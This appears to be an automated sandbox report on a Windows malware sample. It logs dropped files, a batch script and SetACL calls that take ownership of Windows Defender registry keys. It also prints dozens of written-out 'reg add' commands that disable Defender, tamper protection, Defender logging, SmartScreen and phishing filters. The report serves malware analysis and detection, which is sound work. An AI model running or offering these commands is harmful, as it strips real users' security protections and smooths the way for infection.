Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F88BB0
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F5CCB0
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F72CB0
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F84C30
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F78C00
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F80D60
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F64F40
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F99211
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F517C0
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F6F780
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00FA3813
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00FA3933
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F59A40
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F5DA10
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F9DB79
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00FA1CAA
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F5BDD0
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F7BE40
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F63F90
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: String function: 00F59A40 appears 97 times
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: String function: 00F8BC40 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: String function: 00F58900 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: String function: 00F58340 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: String function: 00F61EE0 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: String function: 00F58AD0 appears 66 times
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSentencing.exe4 vs Ptmhbplhxb.exe
Source: Ptmhbplhxb.exe, 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSetACL.exe. vs Ptmhbplhxb.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun.exe C0ABBEEA8AE726503BC5643F3471E378D92FCB59A37043062BBF9BA64D95004C
Source: Ptmhbplhxb.exe | ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe | File read: C:\Users\user\Desktop\Ptmhbplhxb.exe
Source: Ptmhbplhxb.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\Ptmhbplhxb.exe C:\Users\user\Desktop\Ptmhbplhxb.exe
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\do32.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe | Code function: 0_2_004031F1 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004031F1
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F621B0 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,GetLastError,FindCloseChangeNotification,GetLastError,CloseHandle,3_2_00F621B0
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe | File created: C:\Users\user~1\AppData\Local\Temp\nsq9534.tmp
Source: classification engine | Classification label: mal60.winEXE@143/12@0/0
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe | Code function: 0_2_004020CB CoCreateInstance,MultiByteToWideChar,0_2_004020CB
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe | Code function: 0_2_00404496 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404496
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F688E0 GetLastError,#13,SysStringByteLen,SysAllocStringByteLen,SysFreeString,LoadLibraryExW,LoadLibraryExW,FormatMessageW,LocalFree,FreeLibrary,_com_issue_error,_com_issue_error,3_2_00F688E0
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3840:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F62720 FindResourceW,LoadResource,LockResource,FreeResource,3_2_00F62720
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\do32.bat
Source: SetACL32.exe | String found in binary or memory: -help
Source: SetACL32.exe | String found in binary or memory: Type 'SetACL -help' for help.
Source: Ptmhbplhxb.exe | Static file information: File size 3596632 > 1048576
Source: Ptmhbplhxb.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\Win32\Release\SetACL.pdbI source: SetACL32.exe, 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.337990441.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.339317693.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.338670172.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.340772925.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.339891186.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.341509192.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.340983275.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.341713280.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.342214867.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.342983342.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.342556211.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.343532858.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.344356019.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.345325623.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.344643979.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdbG source: SetACL64.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\Win32\Release\SetACL.pdb source: SetACL32.exe, 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.337990441.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.339317693.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.338670172.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.340772925.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.339891186.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.341509192.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.340983275.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.341713280.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.342214867.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.342983342.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.342556211.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.343532858.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.344356019.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.345325623.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.344643979.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: SetACL64.exe.0.dr
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe | Code function: 3_2_00F8B546 push ecx; ret 3_2_00F8B559
Source: SetACL64.exe.0.dr | Static PE information: section name: _RDATA

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe (69 identical entries; the reg.exe command lines are listed with the process creations below)
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe File created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\nsExec.dll
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe File created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe File created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\pdzaicbnewkzt.exe
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe File created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun.exe
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe File created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL64.exe
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe File created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\gafvvkhmsfjamrm.exe
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe File created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun64.exe
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F8AB5F GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00F8AB5F
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX (8 identical entries)
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe TID: 1364 Thread sleep count: 345 > 30
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe TID: 1364 Thread sleep time: -34500s >= -30000s
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\pdzaicbnewkzt.exe
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun.exe
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL64.exe
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\gafvvkhmsfjamrm.exe
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun64.exe
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe Code function: 0_2_00406268 FindFirstFileA,FindClose,0_2_00406268
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe Code function: 0_2_0040572D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040572D
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe Code function: 0_2_004026F8 FindFirstFileA,0_2_004026F8
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F74BF0 std::locale::_Init,std::locale::_Init,FindFirstFileW,GetLastError,FindNextFileW,FindClose,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,RegConnectRegistryW,RegOpenKeyExW,RegCreateKeyExW,RegCloseKey,RegCloseKey,3_2_00F74BF0
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: 3_2_00F840D0 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,3_2_00F840D0
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: 3_2_00F9F7A1 FindFirstFileExW,3_2_00F9F7A1
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe API call chain: ExitProcess graph end node graph_0-3005
Source: SetACL32.exe, 00000004.00000002.339190489.0000000000C77000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
Source: SetACL32.exe, 00000009.00000002.343998236.00000000005C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
Source: SetACL32.exe, 00000003.00000002.338453577.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, SetACL32.exe, 00000005.00000002.340615033.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp, SetACL32.exe, 00000006.00000002.341373587.00000000009A7000.00000004.00000020.00020000.00000000.sdmp, SetACL32.exe, 00000007.00000002.342263578.0000000001307000.00000004.00000020.00020000.00000000.sdmp, SetACL32.exe, 0000000A.00000002.345165275.0000000000797000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SetACL32.exe, 00000008.00000002.343136700.00000000015C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~~
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: 3_2_00F8F1A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00F8F1A3
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: 3_2_00FA0336 GetProcessHeap,3_2_00FA0336
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: 3_2_00F9CB4E mov eax, dword ptr fs:[00000030h] 3_2_00F9CB4E
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: 3_2_00F96588 mov eax, dword ptr fs:[00000030h] 3_2_00F96588
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: 3_2_00F9CB92 mov eax, dword ptr fs:[00000030h] 3_2_00F9CB92
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: 3_2_00F8BB7C SetUnhandledExceptionFilter,3_2_00F8BB7C
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: 3_2_00F8F1A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00F8F1A3
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: 3_2_00F8B715 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00F8B715
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe Code function: 3_2_00F8BA19 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00F8BA19
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\do32.bat
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
